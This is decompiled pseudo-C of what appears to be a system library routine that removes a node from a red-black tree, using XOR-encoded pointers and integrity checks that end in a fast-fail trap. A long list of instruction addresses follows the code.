                                          				signed int _t301;
                                          				signed char _t306;
                                          				signed char _t307;
                                          				signed char _t308;
                                          				signed int _t310;
                                          				signed int _t311;
                                          				signed int _t312;
                                          				signed char _t314;
                                          				signed int _t316;
                                          				signed int _t318;
                                          				signed int _t319;
                                          				signed int _t320;
                                          				signed int _t322;
                                          				signed int _t323;
                                          				signed int _t328;
                                          				signed char _t329;
                                          				signed int _t337;
                                          				signed int _t339;
                                          				signed int _t343;
                                          				signed int _t345;
                                          				signed int _t348;
                                          				signed char _t350;
                                          				signed int _t351;
                                          				signed char _t353;
                                          				signed char _t356;
                                          				signed int _t357;
                                          				signed char _t359;
                                          				signed int _t360;
                                          				signed char _t363;
                                          				signed int _t364;
                                          				signed int _t366;
                                          				signed int* _t372;
                                          				signed char _t373;
                                          				signed char _t378;
                                          				signed int _t379;
                                          				signed int* _t382;
                                          				signed int _t383;
                                          				signed char _t385;
                                          				signed int _t387;
                                          				signed int _t388;
                                          				signed char _t390;
                                          				signed int _t393;
                                          				signed int _t395;
                                          				signed char _t397;
                                          				signed int _t401;
                                          				signed int _t405;
                                          				signed int _t407;
                                          				signed int _t409;
                                          				signed int _t410;
                                          				signed int _t413;
                                          				signed char _t415;
                                          				signed int _t416;
                                          				signed char _t418;
                                          				signed int _t419;
                                          				signed int _t421;
                                          				signed int _t422;
                                          				signed int _t423;
                                          				signed char* _t425;
                                          				signed char _t426;
                                          				signed char _t427;
                                          				signed int _t428;
                                          				signed int _t429;
                                          				signed int _t431;
                                          				signed int _t432;
                                          				signed int _t434;
                                          				signed int _t436;
                                          				signed int _t444;
                                          				signed int _t445;
                                          				signed int _t446;
                                          				signed int _t452;
                                          				signed int _t454;
                                          				signed int _t455;
                                          				signed int _t456;
                                          				signed int _t457;
                                          				signed int _t461;
                                          				signed int _t462;
                                          				signed int _t464;
                                          				signed int _t467;
                                          				signed int _t470;
                                          				signed int _t474;
                                          				signed int _t475;
                                          				signed int _t477;
                                          				signed int _t481;
                                          				signed int _t483;
                                          				signed int _t486;
                                          				signed int _t487;
                                          				signed int _t488;
                                          
                                          				_t285 =  *(_a4 + 4);
                                          				_t444 = _a8;
                                          				_t452 =  *_t444;
                                          				_t421 = _t285 & 1;
                                          				if(_t421 != 0) {
                                          					if(_t452 != 0) {
                                          						_t452 = _t452 ^ _t444;
                                          					}
                                          				}
                                          				_t393 =  *(_t444 + 4);
                                          				if(_t421 != 0) {
                                          					if(_t393 != 0) {
                                          						_t393 = _t393 ^ _t444;
                                          					}
                                          				}
                                          				_t426 = _t393;
                                          				if(_t452 != 0) {
                                          					_t426 = _t452;
                                          				}
                                          				_v5 = _t285 & 0x00000001;
                                          				asm("sbb eax, eax");
                                          				if((_t393 &  ~_t452) != 0) {
                                          					_t289 = _t393;
                                          					_t427 = _v5;
                                          					_t422 = _t393;
                                          					_v12 = _t393;
                                          					_v16 = 1;
                                          					if( *_t393 != 0) {
                                          						_v16 = _v16 & 0x00000000;
                                          						_t445 =  *_t393;
                                          						goto L115;
                                          						L116:
                                          						_t289 = _t445;
                                          						L117:
                                          						_t445 =  *_t289;
                                          						if(_t445 != 0) {
                                          							L115:
                                          							_t422 = _t289;
                                          							if(_t427 != 0) {
                                          								goto L183;
                                          							}
                                          							goto L116;
                                          						} else {
                                          							_t444 = _a8;
                                          							_v12 = _t289;
                                          							goto L27;
                                          						}
                                          						L183:
                                          						if(_t445 == 0) {
                                          							goto L116;
                                          						}
                                          						_t289 = _t289 ^ _t445;
                                          						goto L117;
                                          					}
                                          					L27:
                                          					if(_t427 != 0) {
                                          						if(_t452 == 0) {
                                          							goto L28;
                                          						}
                                          						_t428 = _t289 ^ _t452;
                                          						L29:
                                          						 *_t289 = _t428;
                                          						_t429 =  *(_t452 + 8);
                                          						_v20 = _t429;
                                          						_t426 = _t429 & 0xfffffffc;
                                          						_t292 =  *(_a4 + 4) & 0x00000001;
                                          						_v6 = _t292;
                                          						_t293 = _v12;
                                          						if(_t292 != 0) {
                                          							if(_t426 != 0) {
                                          								_t426 = _t426 ^ _t452;
                                          							}
                                          						}
                                          						if(_t426 != _t444) {
                                          							L174:
                                          							_t423 = 0x1d;
                                          							asm("int 0x29");
                                          							goto L175;
                                          						} else {
                                          							_t436 = _t293;
                                          							if(_v6 != 0) {
                                          								_t436 = _t436 ^ _t452;
                                          							}
                                          							_v20 = _v20 & 0x00000003;
                                          							_v20 = _v20 | _t436;
                                          							 *(_t452 + 8) = _v20;
                                          							_t426 =  *(_t393 + 8) & 0xfffffffc;
                                          							_t356 =  *(_a4 + 4) & 0x00000001;
                                          							_v6 = _t356;
                                          							_t357 = _v12;
                                          							if(_t356 != 0) {
                                          								if(_t426 != 0) {
                                          									_t426 = _t426 ^ _t393;
                                          								}
                                          							}
                                          							if(_t426 != _t444) {
                                          								goto L174;
                                          							} else {
                                          								_t483 = _t393 ^ _t357;
                                          								_v24 = _t483;
                                          								if(_v6 == 0) {
                                          									_v24 = _t357;
                                          								}
                                          								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
                                          								_t426 =  *(_t357 + 4);
                                          								_t444 = _a8;
                                          								_t359 =  *(_a4 + 4) & 0x00000001;
                                          								_v6 = _t359;
                                          								_t360 = _v12;
                                          								_v24 = _t483;
                                          								if(_t359 != 0) {
                                          									_v24 = _t483;
                                          									if(_t426 == 0) {
                                          										goto L37;
                                          									}
                                          									_t426 = _t426 ^ _t360;
                                          									L38:
                                          									if(_v6 == 0) {
                                          										_t483 = _t393;
                                          									}
                                          									_t413 =  *(_t360 + 8);
                                          									 *(_t360 + 4) = _t483;
                                          									_t452 = _t413 & 0xfffffffc;
                                          									_v5 = _t413;
                                          									_t363 =  *(_a4 + 4) & 0x00000001;
                                          									_v6 = _t363;
                                          									if(_t363 != 0) {
                                          										_t364 = _v12;
                                          										_v5 = _t413;
                                          										if(_t452 == 0) {
                                          											goto L41;
                                          										}
                                          										_v20 = _t452;
                                          										_v20 = _v20 ^ _t364;
                                          										L42:
                                          										if(_v20 != _t422) {
                                          											_v5 = _t413;
                                          											if(_v6 == 0) {
                                          												L199:
                                          												_t366 = _v12;
                                          												L200:
                                          												if(_t452 != 0 || _t366 != _t422) {
                                          													goto L174;
                                          												} else {
                                          													goto L43;
                                          												}
                                          											}
                                          											_t366 = _v12;
                                          											_v5 = _t413;
                                          											if(_t452 == 0) {
                                          												goto L199;
                                          											}
                                          											_t452 = _t452 ^ _t366;
                                          											goto L200;
                                          										}
                                          										L43:
                                          										_t486 =  *(_t444 + 8) & 0xfffffffc;
                                          										if(_v6 != 0) {
                                          											if(_t486 != 0) {
                                          												_t486 = _t486 ^ _t444;
                                          											}
                                          											if(_v6 != 0 && _t486 != 0) {
                                          												_t486 = _t486 ^ _t366;
                                          											}
                                          										}
                                          										_t415 = _t413 & 0x00000003 | _t486;
                                          										 *(_t366 + 8) = _t415;
                                          										_t416 = _v12;
                                          										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
                                          										_t452 =  *(_t444 + 8);
                                          										_t372 = _a4;
                                          										if((_t452 & 0xfffffffc) == 0) {
                                          											if( *_t372 != _t444) {
                                          												goto L174;
                                          											} else {
                                          												 *_t372 = _t416;
                                          												goto L52;
                                          											}
                                          										} else {
                                          											_t452 = _t452 & 0xfffffffc;
                                          											_t378 = _t372[1] & 0x00000001;
                                          											_v6 = _t378;
                                          											if(_t378 != 0) {
                                          												if(_t452 != 0) {
                                          													_t452 = _t452 ^ _t444;
                                          												}
                                          											}
                                          											_t379 =  *(_t452 + 4);
                                          											if(_v6 != 0) {
                                          												if(_t379 != 0) {
                                          													_t379 = _t379 ^ _t452;
                                          												}
                                          											}
                                          											_v24 = _t379;
                                          											_t382 = _t452 + (0 | _v24 == _t444) * 4;
                                          											_v28 = _t382;
                                          											_t383 =  *_t382;
                                          											if(_v6 != 0) {
                                          												if(_t383 != 0) {
                                          													_t383 = _t383 ^ _t452;
                                          												}
                                          											}
                                          											if(_t383 != _t444) {
                                          												goto L174;
                                          											} else {
                                          												if(_v6 != 0) {
                                          													_t487 = _t452 ^ _t416;
                                          												} else {
                                          													_t487 = _t416;
                                          												}
                                          												 *_v28 = _t487;
                                          												L52:
                                          												_t373 = _v5;
                                          												L12:
                                          												_t452 = _a4;
                                          												_v5 = _t373 & 0x00000001;
                                          												if(( *(_t452 + 4) & 0x00000001) != 0) {
                                          													if(_t426 == 0) {
                                          														goto L13;
                                          													}
                                          													_t306 = _t422 ^ _t426;
                                          													L14:
                                          													_t444 = _v16;
                                          													 *(_t422 + _t444 * 4) = _t306;
                                          													if(_t426 != 0) {
                                          														_t306 =  *(_t426 + 8) & 0xfffffffc;
                                          														_t418 =  *(_t452 + 4) & 0x00000001;
                                          														_v6 = _t418;
                                          														_t419 = _v12;
                                          														if(_t418 != 0) {
                                          															if(_t306 != 0) {
                                          																_t306 = _t306 ^ _t426;
                                          															}
                                          														}
                                          														if(_t306 != _t419) {
                                          															goto L174;
                                          														} else {
                                          															if(_v6 != 0) {
                                          																if(_t422 != 0) {
                                          																	_t422 = _t422 ^ _t426;
                                          																}
                                          															}
                                          															 *(_t426 + 8) = _t422;
                                          															L24:
                                          															return _t306;
                                          														}
                                          													}
                                          													if(_v5 != _t426) {
                                          														goto L24;
                                          													} else {
                                          														_t395 = _t452;
                                          														_t306 =  *(_t395 + 4);
                                          														L17:
                                          														_t446 = _t423;
                                          														_t434 = _v16 ^ 0x00000001;
                                          														_v24 = _t446;
                                          														_v12 = _t434;
                                          														_t452 =  *(_t423 + _t434 * 4);
                                          														if((_t306 & 0x00000001) != 0) {
                                          															if(_t452 == 0) {
                                          																goto L18;
                                          															}
                                          															_t426 = _t452 ^ _t446;
                                          															L19:
                                          															if(( *(_t426 + 8) & 0x00000001) != 0) {
                                          																_t310 =  *(_t426 + 8) & 0xfffffffc;
                                          																_t444 = _t306 & 1;
                                          																if(_t444 != 0) {
                                          																	if(_t310 != 0) {
                                          																		_t310 = _t310 ^ _t426;
                                          																	}
                                          																}
                                          																if(_t310 != _t423) {
                                          																	goto L174;
                                          																} else {
                                          																	if(_t444 != 0) {
                                          																		if(_t452 != 0) {
                                          																			_t452 = _t452 ^ _t423;
                                          																		}
                                          																	}
                                          																	if(_t452 != _t426) {
                                          																		goto L174;
                                          																	} else {
                                          																		_t452 =  *(_t423 + 8) & 0xfffffffc;
                                          																		if(_t444 != 0) {
                                          																			if(_t452 == 0) {
                                          																				L170:
                                          																				if( *_t395 != _t423) {
                                          																					goto L174;
                                          																				} else {
                                          																					 *_t395 = _t426;
                                          																					L140:
                                          																					if(_t444 != 0) {
                                          																						if(_t452 != 0) {
                                          																							_t452 = _t452 ^ _t426;
                                          																						}
                                          																					}
                                          																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                                          																					_t300 =  *(_t426 + _v16 * 4);
                                          																					if(_t444 != 0) {
                                          																						if(_t300 == 0) {
                                          																							goto L143;
                                          																						}
                                          																						_t300 = _t300 ^ _t426;
                                          																						goto L142;
                                          																					} else {
                                          																						L142:
                                          																						if(_t300 != 0) {
                                          																							_t401 =  *(_t300 + 8);
                                          																							_t452 = _t401 & 0xfffffffc;
                                          																							if(_t444 != 0) {
                                          																								if(_t452 != 0) {
                                          																									_t452 = _t452 ^ _t300;
                                          																								}
                                          																							}
                                          																							if(_t452 != _t426) {
                                          																								goto L174;
                                          																							} else {
                                          																								if(_t444 != 0) {
                                          																									_t481 = _t300 ^ _t423;
                                          																								} else {
                                          																									_t481 = _t423;
                                          																								}
                                          																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
                                          																								goto L143;
                                          																							}
                                          																						}
                                          																						L143:
                                          																						if(_t444 != 0) {
                                          																							if(_t300 != 0) {
                                          																								_t300 = _t300 ^ _t423;
                                          																							}
                                          																						}
                                          																						 *(_t423 + _v12 * 4) = _t300;
                                          																						_t454 = _t426;
                                          																						if(_t444 != 0) {
                                          																							_t455 = _t454 ^ _t423;
                                          																							_t301 = _t455;
                                          																						} else {
                                          																							_t301 = _t423;
                                          																							_t455 = _t454 ^ _t301;
                                          																						}
                                          																						 *(_t426 + _v16 * 4) = _t301;
                                          																						_t395 = _a4;
                                          																						if(_t444 == 0) {
                                          																							_t455 = _t426;
                                          																						}
                                          																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
                                          																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
                                          																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
                                          																						_t426 =  *(_t423 + _v12 * 4);
                                          																						_t306 =  *(_t395 + 4);
                                          																						if((_t306 & 0x00000001) != 0) {
                                          																							if(_t426 != 0) {
                                          																								_t426 = _t426 ^ _t423;
                                          																							}
                                          																						}
                                          																						_t446 = _v24;
                                          																						goto L20;
                                          																					}
                                          																				}
                                          																			}
                                          																			_t452 = _t452 ^ _t423;
                                          																		}
                                          																		if(_t452 == 0) {
                                          																			goto L170;
                                          																		}
                                          																		_t311 =  *(_t452 + 4);
                                          																		if(_t444 != 0) {
                                          																			if(_t311 != 0) {
                                          																				_t311 = _t311 ^ _t452;
                                          																			}
                                          																		}
                                          																		if(_t311 == _t423) {
                                          																			if(_t444 != 0) {
                                          																				L175:
                                          																				_t295 = _t452 ^ _t426;
                                          																				goto L169;
                                          																			} else {
                                          																				_t295 = _t426;
                                          																				L169:
                                          																				 *(_t452 + 4) = _t295;
                                          																				goto L140;
                                          																			}
                                          																		} else {
                                          																			_t312 =  *_t452;
                                          																			if(_t444 != 0) {
                                          																				if(_t312 != 0) {
                                          																					_t312 = _t312 ^ _t452;
                                          																				}
                                          																			}
                                          																			if(_t312 != _t423) {
                                          																				goto L174;
                                          																			} else {
                                          																				if(_t444 != 0) {
                                          																					_t314 = _t452 ^ _t426;
                                          																				} else {
                                          																					_t314 = _t426;
                                          																				}
                                          																				 *_t452 = _t314;
                                          																				goto L140;
                                          																			}
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          															L20:
                                          															_t456 =  *_t426;
                                          															_t307 = _t306 & 0x00000001;
                                          															if(_t456 != 0) {
                                          																if(_t307 != 0) {
                                          																	_t456 = _t456 ^ _t426;
                                          																}
                                          																if(( *(_t456 + 8) & 0x00000001) == 0) {
                                          																	goto L21;
                                          																} else {
                                          																	L56:
                                          																	_t461 =  *(_t426 + _v12 * 4);
                                          																	if(_t307 != 0) {
                                          																		if(_t461 == 0) {
                                          																			L59:
                                          																			_t462 = _v16;
                                          																			_t444 =  *(_t426 + _t462 * 4);
                                          																			if(_t307 != 0) {
                                          																				if(_t444 != 0) {
                                          																					_t444 = _t444 ^ _t426;
                                          																				}
                                          																			}
                                          																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
                                          																			_t452 = _t462 ^ 0x00000001;
                                          																			_t405 =  *(_t395 + 4) & 1;
                                          																			_t316 =  *(_t444 + 8) & 0xfffffffc;
                                          																			_v28 = _t405;
                                          																			_v24 = _t452;
                                          																			if(_t405 != 0) {
                                          																				if(_t316 != 0) {
                                          																					_t316 = _t316 ^ _t444;
                                          																				}
                                          																			}
                                          																			if(_t316 != _t426) {
                                          																				goto L174;
                                          																			} else {
                                          																				_t318 = _t452 ^ 0x00000001;
                                          																				_v32 = _t318;
                                          																				_t319 =  *(_t426 + _t318 * 4);
                                          																				if(_t405 != 0) {
                                          																					if(_t319 != 0) {
                                          																						_t319 = _t319 ^ _t426;
                                          																					}
                                          																				}
                                          																				if(_t319 != _t444) {
                                          																					goto L174;
                                          																				} else {
                                          																					_t320 =  *(_t423 + _t452 * 4);
                                          																					if(_t405 != 0) {
                                          																						if(_t320 != 0) {
                                          																							_t320 = _t320 ^ _t423;
                                          																						}
                                          																					}
                                          																					if(_t320 != _t426) {
                                          																						goto L174;
                                          																					} else {
                                          																						_t322 =  *(_t426 + 8) & 0xfffffffc;
                                          																						if(_t405 != 0) {
                                          																							if(_t322 != 0) {
                                          																								_t322 = _t322 ^ _t426;
                                          																							}
                                          																						}
                                          																						if(_t322 != _t423) {
                                          																							goto L174;
                                          																						} else {
                                          																							_t464 = _t423 ^ _t444;
                                          																							_t323 = _t464;
                                          																							if(_t405 == 0) {
                                          																								_t323 = _t444;
                                          																							}
                                          																							 *(_t423 + _v24 * 4) = _t323;
                                          																							_t407 = _v28;
                                          																							if(_t407 != 0) {
                                          																								if(_t423 != 0) {
                                          																									L72:
                                          																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
                                          																									_t328 =  *(_t444 + _v24 * 4);
                                          																									if(_t407 != 0) {
                                          																										if(_t328 == 0) {
                                          																											L74:
                                          																											if(_t407 != 0) {
                                          																												if(_t328 != 0) {
                                          																													_t328 = _t328 ^ _t426;
                                          																												}
                                          																											}
                                          																											 *(_t426 + _v32 * 4) = _t328;
                                          																											_t467 = _t426 ^ _t444;
                                          																											_t329 = _t467;
                                          																											if(_t407 == 0) {
                                          																												_t329 = _t426;
                                          																											}
                                          																											 *(_t444 + _v24 * 4) = _t329;
                                          																											if(_v28 == 0) {
                                          																												_t467 = _t444;
                                          																											}
                                          																											_t395 = _a4;
                                          																											_t452 = _t426;
                                          																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
                                          																											_t426 = _t444;
                                          																											L80:
                                          																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
                                          																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
                                          																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
                                          																											_t337 =  *(_t426 + 8) & 0xfffffffc;
                                          																											_t444 =  *(_t395 + 4) & 1;
                                          																											if(_t444 != 0) {
                                          																												if(_t337 != 0) {
                                          																													_t337 = _t337 ^ _t426;
                                          																												}
                                          																											}
                                          																											if(_t337 != _t423) {
                                          																												goto L174;
                                          																											} else {
                                          																												_t339 =  *(_t423 + _v12 * 4);
                                          																												if(_t444 != 0) {
                                          																													if(_t339 != 0) {
                                          																														_t339 = _t339 ^ _t423;
                                          																													}
                                          																												}
                                          																												if(_t339 != _t426) {
                                          																													goto L174;
                                          																												} else {
                                          																													_t452 =  *(_t423 + 8) & 0xfffffffc;
                                          																													if(_t444 != 0) {
                                          																														if(_t452 == 0) {
                                          																															L160:
                                          																															if( *_t395 != _t423) {
                                          																																goto L174;
                                          																															} else {
                                          																																 *_t395 = _t426;
                                          																																L93:
                                          																																if(_t444 != 0) {
                                          																																	if(_t452 != 0) {
                                          																																		_t452 = _t452 ^ _t426;
                                          																																	}
                                          																																}
                                          																																_t409 = _v16;
                                          																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
                                          																																_t343 =  *(_t426 + _t409 * 4);
                                          																																if(_t444 != 0) {
                                          																																	if(_t343 == 0) {
                                          																																		goto L96;
                                          																																	}
                                          																																	_t343 = _t343 ^ _t426;
                                          																																	goto L95;
                                          																																} else {
                                          																																	L95:
                                          																																	if(_t343 != 0) {
                                          																																		_t410 =  *(_t343 + 8);
                                          																																		_t452 = _t410 & 0xfffffffc;
                                          																																		if(_t444 != 0) {
                                          																																			if(_t452 != 0) {
                                          																																				_t452 = _t452 ^ _t343;
                                          																																			}
                                          																																		}
                                          																																		if(_t452 != _t426) {
                                          																																			goto L174;
                                          																																		} else {
                                          																																			if(_t444 != 0) {
                                          																																				_t474 = _t343 ^ _t423;
                                          																																			} else {
                                          																																				_t474 = _t423;
                                          																																			}
                                          																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
                                          																																			_t409 = _v16;
                                          																																			goto L96;
                                          																																		}
                                          																																	}
                                          																																	L96:
                                          																																	if(_t444 != 0) {
                                          																																		if(_t343 != 0) {
                                          																																			_t343 = _t343 ^ _t423;
                                          																																		}
                                          																																	}
                                          																																	 *(_t423 + _v12 * 4) = _t343;
                                          																																	if(_t444 != 0) {
                                          																																		_t345 = _t426 ^ _t423;
                                          																																		_t470 = _t345;
                                          																																	} else {
                                          																																		_t345 = _t423;
                                          																																		_t470 = _t426 ^ _t345;
                                          																																	}
                                          																																	 *(_t426 + _t409 * 4) = _t345;
                                          																																	if(_t444 == 0) {
                                          																																		_t470 = _t426;
                                          																																	}
                                          																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
                                          																																	 *(_t423 + 8) = _t306;
                                          																																	goto L24;
                                          																																}
                                          																															}
                                          																														}
                                          																														_t452 = _t452 ^ _t423;
                                          																													}
                                          																													if(_t452 == 0) {
                                          																														goto L160;
                                          																													}
                                          																													_t348 =  *(_t452 + 4);
                                          																													if(_t444 != 0) {
                                          																														if(_t348 != 0) {
                                          																															_t348 = _t348 ^ _t452;
                                          																														}
                                          																													}
                                          																													if(_t348 == _t423) {
                                          																														if(_t444 != 0) {
                                          																															_t350 = _t452 ^ _t426;
                                          																														} else {
                                          																															_t350 = _t426;
                                          																														}
                                          																														 *(_t452 + 4) = _t350;
                                          																														goto L93;
                                          																													} else {
                                          																														_t351 =  *_t452;
                                          																														if(_t444 != 0) {
                                          																															if(_t351 != 0) {
                                          																																_t351 = _t351 ^ _t452;
                                          																															}
                                          																														}
                                          																														if(_t351 != _t423) {
                                          																															goto L174;
                                          																														} else {
                                          																															if(_t444 != 0) {
                                          																																_t353 = _t452 ^ _t426;
                                          																															} else {
                                          																																_t353 = _t426;
                                          																															}
                                          																															 *_t452 = _t353;
                                          																															goto L93;
                                          																														}
                                          																													}
                                          																												}
                                          																											}
                                          																										}
                                          																										_t328 = _t328 ^ _t444;
                                          																									}
                                          																									if(_t328 != 0) {
                                          																										_t475 =  *(_t328 + 8);
                                          																										_v20 = _t475;
                                          																										_t452 = _t475 & 0xfffffffc;
                                          																										if(_t407 != 0) {
                                          																											if(_t452 != 0) {
                                          																												_t452 = _t452 ^ _t328;
                                          																											}
                                          																										}
                                          																										if(_t452 != _t444) {
                                          																											goto L174;
                                          																										} else {
                                          																											if(_t407 != 0) {
                                          																												_t477 = _t328 ^ _t426;
                                          																											} else {
                                          																												_t477 = _t426;
                                          																											}
                                          																											_v20 = _v20 & 0x00000003;
                                          																											_v20 = _v20 | _t477;
                                          																											 *(_t328 + 8) = _v20;
                                          																											goto L74;
                                          																										}
                                          																									}
                                          																									goto L74;
                                          																								}
                                          																							}
                                          																							_t464 = _t423;
                                          																							goto L72;
                                          																						}
                                          																					}
                                          																				}
                                          																			}
                                          																		}
                                          																		_t452 = _t461 ^ _t426;
                                          																	}
                                          																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
                                          																		goto L59;
                                          																	} else {
                                          																		goto L80;
                                          																	}
                                          																}
                                          															}
                                          															L21:
                                          															_t457 =  *(_t426 + 4);
                                          															if(_t457 != 0) {
                                          																if(_t307 != 0) {
                                          																	_t457 = _t457 ^ _t426;
                                          																}
                                          																if(( *(_t457 + 8) & 0x00000001) == 0) {
                                          																	goto L22;
                                          																} else {
                                          																	goto L56;
                                          																}
                                          															}
                                          															L22:
                                          															_t308 =  *(_t423 + 8);
                                          															if((_t308 & 0x00000001) == 0) {
                                          																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                                          																_t306 =  *(_t395 + 4);
                                          																_t431 =  *(_t423 + 8) & 0xfffffffc;
                                          																_t397 = _t306 & 0x00000001;
                                          																if(_t397 != 0) {
                                          																	if(_t431 == 0) {
                                          																		goto L110;
                                          																	}
                                          																	_t423 = _t423 ^ _t431;
                                          																	L111:
                                          																	if(_t423 == 0) {
                                          																		goto L24;
                                          																	}
                                          																	_t432 =  *(_t423 + 4);
                                          																	if(_t397 != 0) {
                                          																		if(_t432 != 0) {
                                          																			_t432 = _t432 ^ _t423;
                                          																		}
                                          																	}
                                          																	_v16 = 0 | _t432 == _t446;
                                          																	_t395 = _a4;
                                          																	goto L17;
                                          																}
                                          																L110:
                                          																_t423 = _t431;
                                          																goto L111;
                                          															} else {
                                          																_t306 = _t308 & 0x000000fe;
                                          																 *(_t423 + 8) = _t306;
                                          																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
                                          																goto L24;
                                          															}
                                          														}
                                          														L18:
                                          														_t426 = _t452;
                                          														goto L19;
                                          													}
                                          												}
                                          												L13:
                                          												_t306 = _t426;
                                          												goto L14;
                                          											}
                                          										}
                                          									}
                                          									L41:
                                          									_t366 = _v12;
                                          									_v20 = _t452;
                                          									goto L42;
                                          								}
                                          								L37:
                                          								_t483 = _v24;
                                          								goto L38;
                                          							}
                                          						}
                                          					}
                                          					L28:
                                          					_t428 = _t452;
                                          					goto L29;
                                          				}
                                          				_t385 = _v5;
                                          				_t422 =  *(_t444 + 8) & 0xfffffffc;
                                          				if(_t385 != 0) {
                                          					if(_t422 != 0) {
                                          						_t422 = _t422 ^ _t444;
                                          					}
                                          				}
                                          				_v12 = _t444;
                                          				if(_t422 == 0) {
                                          					if(_t426 != 0) {
                                          						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
                                          					}
                                          					_t425 = _a4;
                                          					if( *_t425 != _t444) {
                                          						goto L174;
                                          					} else {
                                          						_t425[4] = _t426;
                                          						_t306 = _t425[4] & 0x00000001;
                                          						if(_t306 != 0) {
                                          							_t425[4] = _t425[4] | 0x00000001;
                                          						}
                                          						 *_t425 = _t426;
                                          						goto L24;
                                          					}
                                          				} else {
                                          					_t452 =  *(_t422 + 4);
                                          					if(_t385 != 0) {
                                          						if(_t452 != 0) {
                                          							_t452 = _t452 ^ _t422;
                                          						}
                                          					}
                                          					if(_t452 == _t444) {
                                          						_v16 = 1;
                                          						L11:
                                          						_t373 =  *(_t444 + 8);
                                          						goto L12;
                                          					} else {
                                          						_t387 =  *_t422;
                                          						if(_v5 != 0) {
                                          							if(_t387 != 0) {
                                          								_t387 = _t387 ^ _t422;
                                          							}
                                          						}
                                          						if(_t387 != _t444) {
                                          							goto L174;
                                          						} else {
                                          							_t488 = _a4;
                                          							_v16 = _v16 & 0x00000000;
                                          							_t388 =  *(_t488 + 4);
                                          							_v24 = _t388;
                                          							if((_t388 & 0xfffffffe) == _t444) {
                                          								if(_t426 != 0) {
                                          									 *(_t488 + 4) = _t426;
                                          									if((_v24 & 0x00000001) != 0) {
                                          										_t390 = _t426;
                                          										L228:
                                          										 *(_t488 + 4) = _t390 | 0x00000001;
                                          									}
                                          									goto L11;
                                          								}
                                          								 *(_t488 + 4) = _t422;
                                          								if((_v24 & 0x00000001) == 0) {
                                          									goto L11;
                                          								} else {
                                          									_t390 = _t422;
                                          									goto L228;
                                          								}
                                          							}
                                          							goto L11;
                                          						}
                                          					}
                                          				}
                                          			}

                                          0x012ffaa4
                                          0x012ffaa6
                                          0x012ffaa9
                                          0x012ffaac
                                          0x01355db7
                                          0x01355dbd
                                          0x01355dbd
                                          0x01355db7
                                          0x012ffab4
                                          0x00000000
                                          0x012ffaba
                                          0x012ffabc
                                          0x012ffac2
                                          0x012ffac5
                                          0x012ffac7
                                          0x012ffac7
                                          0x012ffad6
                                          0x012ffad9
                                          0x012ffadf
                                          0x012ffae2
                                          0x012ffae4
                                          0x012ffae7
                                          0x012ffaea
                                          0x012ffaed
                                          0x01355dc4
                                          0x01355dc9
                                          0x00000000
                                          0x00000000
                                          0x01355dcf
                                          0x012ffaf6
                                          0x012ffafa
                                          0x012ffafc
                                          0x012ffafc
                                          0x012ffafe
                                          0x012ffb01
                                          0x012ffb09
                                          0x012ffb0c
                                          0x012ffb12
                                          0x012ffb14
                                          0x012ffb17
                                          0x01355dd6
                                          0x01355dd9
                                          0x01355dde
                                          0x00000000
                                          0x00000000
                                          0x01355de4
                                          0x01355de7
                                          0x012ffb29
                                          0x012ffb2c
                                          0x01355df3
                                          0x01355df6
                                          0x01355e06
                                          0x01355e0c
                                          0x01355e0f
                                          0x01355e11
                                          0x00000000
                                          0x01355e1f
                                          0x00000000
                                          0x01355e1f
                                          0x01355e11
                                          0x01355df8
                                          0x01355dfb
                                          0x01355e00
                                          0x00000000
                                          0x00000000
                                          0x01355e02
                                          0x00000000
                                          0x01355e02
                                          0x012ffb32
                                          0x012ffb35
                                          0x012ffb3c
                                          0x01355e26
                                          0x01355e28
                                          0x01355e28
                                          0x01355e2e
                                          0x01355e3c
                                          0x01355e3c
                                          0x01355e2e
                                          0x012ffb45
                                          0x012ffb47
                                          0x012ffb53
                                          0x012ffb56
                                          0x012ffb59
                                          0x012ffb5c
                                          0x012ffb65
                                          0x0130000d
                                          0x00000000
                                          0x0130000f
                                          0x0130000f
                                          0x00000000
                                          0x0130000f
                                          0x012ffb6b
                                          0x012ffb6e
                                          0x012ffb71
                                          0x012ffb73
                                          0x012ffb76
                                          0x01355e45
                                          0x01355e4b
                                          0x01355e4b
                                          0x01355e45
                                          0x012ffb80
                                          0x012ffb83
                                          0x01355e54
                                          0x01355e5a
                                          0x01355e5a
                                          0x01355e54
                                          0x012ffb89
                                          0x012ffb98
                                          0x012ffb9b
                                          0x012ffb9e
                                          0x012ffba0
                                          0x01355e63
                                          0x01355e69
                                          0x01355e69
                                          0x01355e63
                                          0x012ffba8
                                          0x00000000
                                          0x012ffbae
                                          0x012ffbb2
                                          0x01355e70
                                          0x012ffbb8
                                          0x012ffbb8
                                          0x012ffbb8
                                          0x012ffbbd
                                          0x012ffbbf
                                          0x012ffbbf
                                          0x012ff9a8
                                          0x012ff9a8
                                          0x012ff9ad
                                          0x012ff9b4
                                          0x01355eda
                                          0x00000000
                                          0x00000000
                                          0x01355ee2
                                          0x012ff9bc
                                          0x012ff9bc
                                          0x012ff9bf
                                          0x012ff9c4
                                          0x012ffde6
                                          0x012ffde9
                                          0x012ffdec
                                          0x012ffdef
                                          0x012ffdf2
                                          0x01355eeb
                                          0x01355ef1
                                          0x01355ef1
                                          0x01355eeb
